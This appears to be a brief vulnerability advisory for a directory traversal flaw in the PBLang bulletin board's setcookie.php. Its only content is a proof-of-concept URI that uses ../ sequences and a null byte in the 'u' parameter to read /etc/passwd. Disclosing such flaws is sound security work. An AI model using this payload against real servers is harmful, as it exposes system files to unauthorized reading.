• info
• discussion
• exploit
• solution
• references

PBLang Bulletin Board System SetCookie.PHP Directory Traversal Vulnerability

No exploit is required.

The following proof of concept URI is available:
http://www.example.com/pblang/setcookie.php?u=../../../../../etc/passwd%00